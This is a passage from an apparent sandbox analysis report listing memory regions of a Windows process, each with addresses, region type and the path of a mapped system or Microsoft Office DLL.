filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 280
start_va = 0x7fef3340000
end_va = 0x7fef33fffff
entry_point = 0x7fef3340000
region_type = mapped_file
name = "wwintl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll")
Region:
id = 281
start_va = 0x7fef3400000
end_va = 0x7fef34e1fff
entry_point = 0x7fef3400000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 282
start_va = 0x7fef34f0000
end_va = 0x7fef357afff
entry_point = 0x7fef34f0000
region_type = mapped_file
name = "mso50win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll")
Region:
id = 283
start_va = 0x7fef3580000
end_va = 0x7fef361bfff
entry_point = 0x7fef3580000
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcp140.dll")
Region:
id = 284
start_va = 0x7fef3620000
end_va = 0x7fef36e5fff
entry_point = 0x7fef3620000
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 285
start_va = 0x7fef4d40000
end_va = 0x7fef4d5bfff
entry_point = 0x7fef4d40000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 286
start_va = 0x7fef4d60000
end_va = 0x7fef4dc1fff
entry_point = 0x7fef4d60000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 287
start_va = 0x7fef54d0000
end_va = 0x7fef5540fff
entry_point = 0x7fef54d0000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 288
start_va = 0x7fef59c0000
end_va = 0x7fef59cbfff
entry_point = 0x7fef59c0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 289
start_va = 0x7fef5ff0000
end_va = 0x7fef6063fff
entry_point = 0x7fef5ff0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 290
start_va = 0x7fef6100000
end_va = 0x7fef62f1fff
entry_point = 0x7fef6100000
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 291
start_va = 0x7fef6570000
end_va = 0x7fef6580fff
entry_point = 0x7fef6570000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 292
start_va = 0x7fef7190000
end_va = 0x7fef71f3fff
entry_point = 0x7fef7190000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 293
start_va = 0x7fef7200000
end_va = 0x7fef7270fff
entry_point = 0x7fef7200000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 294
start_va = 0x7fef8370000
end_va = 0x7fef8559fff
entry_point = 0x7fef8370000
region_type = mapped_file
name = "c2r64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")
Region:
id = 295
start_va = 0x7fef8560000
end_va = 0x7fef8799fff
entry_point = 0x7fef8560000
region_type = mapped_file
name = "appvisvsubsystems64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")
Region:
id = 296
start_va = 0x7fef8a90000
end_va = 0x7fef8aa8fff
entry_point = 0x7fef8a90000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 297
start_va = 0x7fef8ab0000
end_va = 0x7fef8ac4fff
entry_point = 0x7fef8ab0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 298
start_va = 0x7fef93b0000
end_va = 0x7fef93b8fff
entry_point = 0x7fef93b0000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 299
start_va = 0x7fef9660000
end_va = 0x7fef9677fff
entry_point = 0x7fef9660000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 300
start_va = 0x7fef9680000
end_va = 0x7fef9690fff
entry_point = 0x7fef9680000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 301
start_va = 0x7fef96b0000
end_va = 0x7fef9702fff
entry_point = 0x7fef96b0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 302
start_va = 0x7fef9810000
end_va = 0x7fef98b6fff
entry_point = 0x7fef9810000
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 303
start_va = 0x7fef98c0000
end_va = 0x7fef9914fff
entry_point = 0x7fef98c0000
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")
Region:
id = 304
start_va = 0x7fef9920000
end_va = 0x7fef9953fff
entry_point = 0x7fef9920000
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")
Region:
id = 305
start_va = 0x7fefa530000
end_va = 0x7fefa74cfff
entry_point = 0x7fefa530000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 306
start_va = 0x7fefa750000
end_va = 0x7fefaa65fff
entry_point = 0x7fefa750000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 307
start_va = 0x7fefaa80000
end_va = 0x7fefaa82fff
entry_point = 0x7fefaa80000
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 308
start_va = 0x7fefaa90000
end_va = 0x7fefaa92fff
entry_point = 0x7fefaa90000
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 309
start_va = 0x7fefaaa0000
end_va = 0x7fefaaa2fff
entry_point = 0x7fefaaa0000
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 310
start_va = 0x7fefaab0000
end_va = 0x7fefaab2fff
entry_point = 0x7fefaab0000
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 311
start_va = 0x7fefaac0000
end_va = 0x7fefaac4fff
entry_point = 0x7fefaac0000
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 312
start_va = 0x7fefaad0000
end_va = 0x7fefaad4fff
entry_point = 0x7fefaad0000
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 313
start_va = 0x7fefaae0000
end_va = 0x7fefaae2fff
entry_point = 0x7fefaae0000
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 314
start_va = 0x7fefab90000
end_va = 0x7fefab93fff
entry_point = 0x7fefab90000
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 315
start_va = 0x7fefaba0000
end_va = 0x7fefaba3fff
entry_point = 0x7fefaba0000
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 316
start_va = 0x7fefabb0000
end_va = 0x7fefabb2fff
entry_point = 0x7fefabb0000
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 317
start_va = 0x7fefabc0000
end_va = 0x7fefabc3fff
entry_point = 0x7fefabc0000
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 318
start_va = 0x7fefabd0000
end_va = 0x7fefabd2fff
entry_point = 0x7fefabd0000
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 319
start_va = 0x7fefabe0000
end_va = 0x7fefabe2fff
entry_point = 0x7fefabe0000
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 320
start_va = 0x7fefabf0000
end_va = 0x7fefabf2fff
entry_point = 0x7fefabf0000
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 321
start_va = 0x7fefac00000
end_va = 0x7fefac02fff
entry_point = 0x7fefac00000
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 322
start_va = 0x7fefac10000
end_va = 0x7fefac12fff
entry_point = 0x7fefac10000
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 323
start_va = 0x7fefac20000
end_va = 0x7fefac22fff
entry_point = 0x7fefac20000
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 324
start_va = 0x7fefac30000
end_va = 0x7fefad21fff
entry_point = 0x7fefac30000
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 325
start_va = 0x7fefad30000
end_va = 0x7fefad33fff
entry_point = 0x7fefad30000
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 326
start_va = 0x7fefad40000
end_va = 0x7fefad55fff
entry_point = 0x7fefad40000
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 327
start_va = 0x7fefb590000
end_va = 0x7fefb59afff
entry_point = 0x7fefb590000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 328
start_va = 0x7fefb670000
end_va = 0x7fefb67afff
entry_point = 0x7fefb670000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 329
start_va = 0x7fefb680000
end_va = 0x7fefb6a6fff
entry_point = 0x7fefb680000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 330
start_va = 0x7fefb800000
end_va = 0x7fefb814fff
entry_point = 0x7fefb800000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 331
start_va = 0x7fefbb00000
end_va = 0x7fefbb2cfff
entry_point = 0x7fefbb00000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 332
start_va = 0x7fefbc10000
end_va = 0x7fefbc17fff
entry_point = 0x7fefbc10000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 333
start_va = 0x7fefbd80000
end_va = 0x7fefbd94fff
entry_point = 0x7fefbd80000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 334
start_va = 0x7fefbda0000
end_va = 0x7fefbdabfff
entry_point = 0x7fefbda0000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 335
start_va = 0x7fefbdb0000
end_va = 0x7fefbdc5fff
entry_point = 0x7fefbdb0000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 336
start_va = 0x7fefbee0000
end_va = 0x7fefbef0fff
entry_point = 0x7fefbee0000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 337
start_va = 0x7fefbf10000
end_va = 0x7fefc039fff
entry_point = 0x7fefbf10000
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")
Region:
id = 338
start_va = 0x7fefc040000
end_va = 0x7fefc074fff
entry_point = 0x7fefc040000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 339
start_va = 0x7fefc080000
end_va = 0x7fefc097fff
entry_point = 0x7fefc080000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 340
start_va = 0x7fefc290000
end_va = 0x7fefc4a4fff
entry_point = 0x7fefc290000
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 341
start_va = 0x7fefc4b0000
end_va = 0x7fefc505fff
entry_point = 0x7fefc4b0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 342
start_va = 0x7fefc510000
end_va = 0x7fefc63bfff
entry_point = 0x7fefc510000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 343
start_va = 0x7fefc690000
end_va = 0x7fefc883fff
entry_point = 0x7fefc690000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 344
start_va = 0x7fefcb80000
end_va = 0x7fefcbabfff
entry_point = 0x7fefcb80000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 345
start_va = 0x7fefcd50000
end_va = 0x7fefcd5bfff
entry_point = 0x7fefcd50000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 346
start_va = 0x7fefce20000
end_va = 0x7fefce26fff
entry_point = 0x7fefce20000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 347
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
entry_point = 0x7fefcf30000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 348
start_va = 0x7fefd080000
end_va = 0x7fefd089fff
entry_point = 0x7fefd080000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 349
start_va = 0x7fefd0c0000
end_va = 0x7fefd10bfff
entry_point = 0x7fefd0c0000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 350
start_va = 0x7fefd180000
end_va = 0x7fefd1c6fff
entry_point = 0x7fefd180000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 351
start_va = 0x7fefd2a0000
end_va = 0x7fefd2fafff
entry_point = 0x7fefd2a0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 352
start_va = 0x7fefd410000
end_va = 0x7fefd416fff
entry_point = 0x7fefd410000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 353
start_va = 0x7fefd420000
end_va = 0x7fefd474fff
entry_point = 0x7fefd420000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 354
start_va = 0x7fefd480000
end_va = 0x7fefd496fff
entry_point = 0x7fefd480000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 355
start_va = 0x7fefd5f0000
end_va = 0x7fefd611fff
entry_point = 0x7fefd5f0000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 356
start_va = 0x7fefd620000
end_va = 0x7fefd66dfff
entry_point = 0x7fefd620000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 357
start_va = 0x7fefd980000
end_va = 0x7fefd9a2fff
entry_point = 0x7fefd980000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 358
start_va = 0x7fefda20000
end_va = 0x7fefda2afff
entry_point = 0x7fefda20000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 359
start_va = 0x7fefda50000
end_va = 0x7fefda74fff
entry_point = 0x7fefda50000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 360
start_va = 0x7fefda80000
end_va = 0x7fefda8efff
entry_point = 0x7fefda80000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 361
start_va = 0x7fefdb30000
end_va = 0x7fefdb6cfff
entry_point = 0x7fefdb30000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 362
start_va = 0x7fefdb70000
end_va = 0x7fefdb83fff
entry_point = 0x7fefdb70000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 363
start_va = 0x7fefdb90000
end_va = 0x7fefdb9efff
entry_point = 0x7fefdb90000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 364
start_va = 0x7fefdc30000
end_va = 0x7fefdc3efff
entry_point = 0x7fefdc30000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 365
start_va = 0x7fefdce0000
end_va = 0x7fefdd15fff
entry_point = 0x7fefdce0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 366
start_va = 0x7fefdd20000
end_va = 0x7fefdd59fff
entry_point = 0x7fefdd20000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 367
start_va = 0x7fefdd60000
end_va = 0x7fefddcafff
entry_point = 0x7fefdd60000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 368
start_va = 0x7fefddd0000
end_va = 0x7fefdde9fff
entry_point = 0x7fefddd0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 369
start_va = 0x7fefddf0000
end_va = 0x7fefdf56fff
entry_point = 0x7fefddf0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 370
start_va = 0x7fefdf60000
end_va = 0x7fefdfc6fff
entry_point = 0x7fefdf60000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 371
start_va = 0x7fefdfd0000
end_va = 0x7fefed57fff
entry_point = 0x7fefdfd0000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 372
start_va = 0x7fefed60000
end_va = 0x7fefed8dfff
entry_point = 0x7fefed60000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 373
start_va = 0x7fefee30000
end_va = 0x7fefee7cfff
entry_point = 0x7fefee30000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 374
start_va = 0x7fefee80000
end_va = 0x7feff0d8fff
entry_point = 0x7fefee80000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 375
start_va = 0x7feff0e0000
end_va = 0x7feff1bafff
entry_point = 0x7feff0e0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 376
start_va = 0x7feff1c0000
end_va = 0x7feff1defff
entry_point = 0x7feff1c0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 377
start_va = 0x7feff1e0000
end_va = 0x7feff2e8fff
entry_point = 0x7feff1e0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 378
start_va = 0x7feff2f0000
end_va = 0x7feff4c6fff
entry_point = 0x7feff2f0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 379
start_va = 0x7feff4d0000
end_va = 0x7feff598fff
entry_point = 0x7feff4d0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 380
start_va = 0x7feff5a0000
end_va = 0x7feff63efff
entry_point = 0x7feff5a0000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 381
start_va = 0x7feff640000
end_va = 0x7feff6b0fff
entry_point = 0x7feff640000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 382
start_va = 0x7feff6e0000
end_va = 0x7feff857fff
entry_point = 0x7feff6e0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 383
start_va = 0x7feff860000
end_va = 0x7feff86dfff
entry_point = 0x7feff860000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 384
start_va = 0x7feff870000
end_va = 0x7feff999fff
entry_point = 0x7feff870000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 385
start_va = 0x7feff9a0000
end_va = 0x7feffa38fff
entry_point = 0x7feff9a0000
region_type = mapped_file
